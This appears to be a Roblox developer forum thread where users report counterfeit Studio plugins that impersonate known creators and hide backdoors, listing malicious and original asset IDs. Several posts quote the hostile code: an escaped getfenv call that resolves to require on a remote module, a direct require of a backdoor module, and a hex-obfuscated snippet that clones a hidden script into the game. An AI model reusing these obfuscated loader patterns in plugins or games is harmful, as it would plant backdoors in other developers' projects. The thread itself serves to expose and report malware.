Malicious plugin: 5606261789
Original plugin: 4476041065
For that plugin alone, the friends of these users all look like bots. These are the only two non-bot people that are in the group that produced the malicious plugin.
Group: GizmoTjaz - Roblox --Probably trying to frame someone, actual person’s profile is here: GizmoTjaz - Roblox
DuazDaio: DuazDaio - Roblox
KaspersHub: KaspersHub - Roblox
I have a slight feeling these are stolen accounts, but I’m not sure.
Note: KaspersHub is also in a lot of other groups with similar logos.
I’m pretty sure it’s a backdoor group (and the bot accounts are possibly alts?)
Most likely, but the users I mentioned specifically have robux. I think they were stolen and then linked to all these bot accounts. Whoever did this was really good in covering their tracks. there are hundreds of bots.
1 Like
plugin checks for any and all scripts in the game and places multiple lines of requirements saying this
getfenv()[‘\114\101\113\117\105\114\101’][5151855975]
Malicious plugin: 6173331887
Original plugin: 866972013
I found another malicious plugin:
Real plugin (ID:6426578337) :
Fake Plugin (ID: 6427852822):
The fake plugin contains some malicious code:
workspace:WaitForChild("\0x54\0x65\0x72\0x72\0x61\0x69\0x6e"):FindFirstChild('\0x47\0x72\0x61\0x73\0x73\0x46\0x58')then a=script:WaitForChild("\0x47\0x72\0x61\0x73\0x73\0x46\0x58"):Clone()a.Parent=workspace:WaitForChild("\0x43\0x61\0x6d\0x65\0x72\0x61")a.Disabled=false;end
And also I found GrassFX script inside of the fake plugin:
And the code sample from the GrassFX script:
Thank you so much, this helped me out a LOT!
This is a virus: Smooth Cam - Roblox
the string is base64 for the into of The Prince of Belair
contains bytecode interpreters
1 Like
Also says it is created by @sleitnick that is a known plugin creator and his plugins are totally not malicious in anyway. Looks like the actual group is trying to impersonate.
1 Like
How has this not been shut down yet?? He has multiple groups that are obviously meant to impersonate well known developers and teams.
I also found this:
Roblox Studio+
Malicious Plugin: 5871957158
Original Plugin: 144358935
Malicious Script Location: PluginGuiService > PluginGui > Layers > UIListLayout > FX
Malicious Action:
require(5870849966)
Malicious Required Module: 5870849966*
*Suspicious obfuscated code. Assuming this is the source of the backdoor that multiple posts above have connected with the Updated/New mark at the top of the plugin thumbnail.
The plugin was published by a group named ROBLOX to make it seem as if the official ROBLOX account created it.
ROBLOX Impersonation: 8135004
1 Like
I hooked the functions of the obfuscated module and it seems that it was only calling require to this module MainModule - Roblox
It has a GUI for a server side backdoor service called “Ubuntu SS” which I have never heard of here is a picture.
The logging place for HTTP logs is
and the group for whitelisting seems to be
The module also seems to contain some webhooks URLs but they seem invalid. I am not sure if they were previously used for logging and were removed, if they were abused and removed thus or are just decous.
3 Likes
Over half of these plugins are real, without any malicious intent.
2 Likes
No plugin from the list is malicious.
I took a look at those plugin’s source and did not find anything. Also I see you have already posted 3 of those plugins already on this topic.
I just read through it’s source, turns out it was a mistake on my end. Sorry for re-posting, didn’t realize that.
1 Like
Building Tools by F3X (Plugin)
Malicious plugin: 6240474358
Original plugin: 144950355
[FIXED] Realism Mod
Malicious plugin: 6792716290
Original plugin: 400812710
Load Character Lite
Malicious plugin: 6789266789
Original plugin: 752585459
to be continued…
Someone apparently made a copy of AlreadyPro’s Load Character Pro under the name of “AlreadyPro” a group owned by a deleted account. Reported the plugin for using the code of AlreadyPro and also malicious code.
Malicious:
Original:
1 Like
Load Character Pro
Original: 4489766693
Malicious: 7070331213
Drops a malicious script. Malicious plugin creator attempting to impersonate AlreadyPro.
1 Like
Yes
I would also like to report this one as well: Malicious Plugin
It’s a group that impersonates his name to promote their fake plugin.